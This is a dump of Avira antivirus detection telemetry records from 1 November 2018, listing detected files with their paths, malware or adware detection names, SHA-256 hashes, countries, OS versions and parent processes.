  Row(detection=Row(filename='avscan-20181101-183848-f9754e92', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9657736d\\AVSCAN-20181101-183628-ED471A56\\AVSCAN-20181101-183848-F9754E92', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:38:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='report_lpa.exe', filepath='D:\\DATA_SHARE\\program\\HRD_LPA\\report_lpa\\report_lpa.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bos_manage.exe', filepath='\\\\?\\C:\\Program Files\\BOSaNOVA Harel\\Bos_Manage.exe', filesize=344000, name='HEUR/APC.#M1.#R1'), hash='4672024f21ff8fc4ab5de1467761e7b0cfd4ae1fb2512bc7ea979843dcd9a133', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:03:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0083963c4655cd66b99064c581ee03f11b581b928ce15dabe95e49b8d3c76af4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_20.10.2019-12.available\\Avira\\0083963C4655CD66B99064C581EE03F11B581B928CE15DABE95E49B8D3C76AF4', filesize=852000, name='W32/Neshta.A.#M1.#R1'), hash='0083963c4655cd66b99064c581ee03f11b581b928ce15dabe95e49b8d3c76af4', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:06:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wspsetup.exe', filepath='C:\\Users\\X\\Downloads\\wspsetup.exe', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-01T14:36:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142741-6ab45972', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_04471ea5\\AVSCAN-20181101-142703-64C80461\\AVSCAN-20181101-142741-6AB45972', filesize=1408000, name='X2000M/Laroux.B.#M1.#R1'), hash='2f5f15749752e7dc7ed01e76fca7f94606b19046c89897b234a063fd7b2b21dd', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp10441571\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/mnl', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\happy-wheels (1).exe', parentsize=2508528, timestamp='2018-11-01T17:20:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='firefox installer.exe', filepath='\\\\M-nas2016\\setup\\   PC-instal\\Firefox Installer.exe', filesize=128000, name='W32/Stanit.#M1.#R1'), hash='3a6640d7650a85d6b4029725c1d1c8be872c258553e760b91da2b831603b70bc', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8560488, timestamp='2018-11-01T15:01:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='evakuasi kebakaran lpa sept 2015.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\new\\LATIHAN EVAKUASI KEBAKARAN LPA SEPT 2015\\EVAKUASI KEBAKARAN LPA SEPT 2015.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='work new.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\GAJI\\work new\\work new.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212646-5997b812', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ac0b4351\\AVSCAN-20181101-212454-4C8F8235\\AVSCAN-20181101-212646-5997B812', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:26:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='35 english.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\RPG\\AUDIT\\Suggestion Corrective Action\\GSM\\GSM VERSI ENGLISH\\NC 35 English\\35 English.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155225-9d86eb2d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155225-9D86EB2D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:52:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='baa8ec91f0a7ca4f60de1a22a66d9b0e480a4bc8', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\2\\baa8ec91f0a7ca4f60de1a22a66d9b0e480a4bc8', filesize=1216000, name='W32/Virut.Gen.#M1.#R1'), hash='3467ffde1260853ebad6d8dcdff007c311c2c0196751609e0c99cfc85132eeed', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:27:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155518-3b470bab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-155204-205028ED\\AVSCAN-20181101-155518-3B470BAB', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:14:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T11:08:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rpg  2015.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\LEMBURAN RPG  2015\\RPG  2015.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:26:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:40:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:20:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='3 (joel sinaga).scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\FD PAK HERMAN\\Hari 3 (Joel Sinaga)\\3 (Joel Sinaga).scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwhd9bd.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWHD9BD.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:31:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-084332-750e1b9c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e3c83d58\\AVSCAN-20181101-084317-726FAA45\\AVSCAN-20181101-084332-750E1B9C', filesize=1088000, name='X2000M/Agent.91364890.#M1.#R1'), hash='6d9769b7e80e04ca43279bcc8ca0d62cf3eb229fb623837eaef03a7fd2fccfcc', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:43:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142837-21986809', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142837-21986809', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f.exe', filepath='C:\\ProgramData\\50Coupons\\F.exe', filesize=704000, name='ADWARE/MultiPlug.Gen.#M300.#R6864'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline='--engine=2 --session-id=NEk3Mu9iP1Jl7knGdwZd8AKuEdvTSSEGt2u2cEhE --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.177.200\\software_reporter_tool.exe', parentsize=12084856, timestamp='2018-11-01T10:44:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111232-70e93cc3', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-111202-1353B3F0\\AVSCAN-20181101-111232-70E93CC3', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:12:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c3beb124d478202777dbf55dceb59bb06d75b07a597bcc3a040f208acbc4a91e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\C3BEB124D478202777DBF55DCEB59BB06D75B07A597BCC3A040F208ACBC4A91E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c3beb124d478202777dbf55dceb59bb06d75b07a597bcc3a040f208acbc4a91e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-065059-d2461a74', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a5630359\\AVSCAN-20181102-061432-22746AB5\\AVSCAN-20181102-065059-D2461A74', filesize=640000, name='Adware/DealPly.c0d067.#M1.#R1'), hash='c0d06732c9838d919f8696b6bdec46ef975b00fb14710fe529565f813da90ac2', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T23:50:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unconfirmed 108949.crdownload', filepath='C:\\Users\\X\\Downloads\\Unconfirmed 108949.crdownload', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline='\\\\\\/Run \\\\\\/TN \\\\\\"Avira_Antivirus_Systray\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\schtasks.exe', parentsize=179712, timestamp='2018-11-01T15:29:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111650-270afdf8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111650-270AFDF8', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:16:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='escdll.dll', filepath='C:\\Windows\\System32\\escdll.dll', filesize=60000, name='W32/Ramnit.CD.#M1.#R1'), hash='99e743b7e7015210545d206355a3ea86583c4ea5c425112276661a5ddd87bf10', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\escsrv.exe', parentsize=94208, timestamp='2018-11-01T00:56:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123832-dd99add2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123809-CA320C60\\AVSCAN-20181101-123832-DD99ADD2', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:38:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sculpteouploader.exe', filepath='C:\\Program Files\\Pixologic\\ZBrush 4R8\\ZStartup\\ZPlugs64\\SculpteoData\\Uploader\\SculpteoUploader.exe', filesize=5000000, name='HEUR/AGEN.1028299.#M1.#R1'), hash='b6eec48c274983f3fd910068c1587c2491d810594440a0551dc5d9c577949d3b', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Pixologic ZBrush 4R8 P2 (x64) + Crack - [CrackzSoft]\\Update\\ZBrush_4R8_P2_Updater.exe', parentsize=111780192, timestamp='2018-11-01T07:22:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clover.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Clover\\Clover.exe', filesize=244000, name='PUA/SoftCnapp.QW.#M1.#R1'), hash='a26d6a79d7b4796db55a23e67b1a5911fc981b7a39e0bc847e1f35ff681be7bf', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:36:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='freeyoutubetomp3converter(3).exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\FreeYouTubeToMP3Converter(3).exe', filesize=34488000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='885a5e231bfa625466aea0661ba90b13ca00a3238d9107b2bbc68da2bdaeaf49', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:58:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='5ffadf2a47843f8f3bf6e27f82e20df0a6d35e7e49548ef2b2afa6e0f3703ad7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.categorizing\\5FFADF2A47843F8F3BF6E27F82E20DF0A6D35E7E49548EF2B2AFA6E0F3703AD7', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='5ffadf2a47843f8f3bf6e27f82e20df0a6d35e7e49548ef2b2afa6e0f3703ad7', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T11:59:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111711-29af4094', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111711-29AF4094', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:16:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142848-22ab1538', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142848-22AB1538', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wa.xls', filepath='\\\\sango04\\rheology\\INA\\INA-Backup\\Dtina-mbi-wa\\WA.XLS', filesize=192000, name='X2000M/Laroux.B.#M1.#R1'), hash='58aeb835d15e94e4af50fa2805e63806c1c586cb5cac86067cdf28ab0d2c21f2', metadata=Row(cmdline='\\\\\\/factory,{ceff45ee-c862-41de-aee2-a022c81eda92} -Embedding', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4674360, timestamp='2018-11-01T07:55:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='9efcb170c89b7575c13953719263eff6f74be1ffb30c6f047e917ec5793ccfc9', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\SoftwareUpdater\\AviraSoftwareUpdaterToastNotificationsBridge.exe', parentsize=103880, timestamp='2018-11-01T19:42:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110028-ab32b818', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110028-AB32B818', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:00:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\D:\\soft\\nhm_windows_1.9.0.5\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:37:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmplayer.exe', filepath='\\\\?\\D:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='544dde8c316c6602a65d70e5a767b16442ceb187595c91b4ebf191ae096abd45', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:20:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-174742-0ed225b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_97e40d2c\\AVSCAN-20181101-174724-0B25BEEB\\AVSCAN-20181101-174742-0ED225B3', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='88723e07f10da4f273d86dd702476abc8e39e8a8f7e2ca936827af81e112701c', metadata=Row(cmdline=None, country='DK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:47:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='850ca00d90a58c0b83e7fdd21a075e7c7fd80f79b125778c2c0dbdffb2f2d14d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\850CA00D90A58C0B83E7FDD21A075E7C7FD80F79B125778C2C0DBDFFB2F2D14D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='850ca00d90a58c0b83e7fdd21a075e7c7fd80f79b125778c2c0dbdffb2f2d14d', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:07:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-180037-0935f2c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1a747412\\AVSCAN-20181101-175858-CE3F319C\\AVSCAN-20181101-180037-0935F2C9', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:00:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='openvpn.exe', filepath='C:\\Program Files (x86)\\VPN Unlimited\\openvpn.exe', filesize=768000, name='W32/Neshta.A.#M1.#R1'), hash='239f2c85506cf6e390ba59748b42df87f954d10ce36651c6a852bdd0614dbe71', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:H5FO5tPPfE+TdrdY.1', country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T07:41:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='spideypc.exe', filepath='k:\\العاب خفيفه\\اسبيدرمان\\SpideyPC.exe', filesize=1536000, name='W32/Virut.Gen.#M1.#R1'), hash='7015164ce0a5bc470940ae2da5ac217931309aa80bda0f097dd6ccd2695637aa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:05:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-214933-5f6ccf0f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d255a0e\\AVSCAN-20181101-214912-5C8B5C98\\AVSCAN-20181101-214933-5F6CCF0F', filesize=768000, name='TR/Dldr.Zampol.75e966.#M1.#R1'), hash='75e9662275fd9a5eeb9c632ff17ca43dba27480b6123c70517609ebb6e0d51e1', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:49:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-012352-69e58f35', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9a6eba25\\AVSCAN-20181102-012305-66DFF80C\\AVSCAN-20181102-012352-69E58F35', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:23:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T12:57:58Z'), dt=datetime.date(2018, 11, 1)),
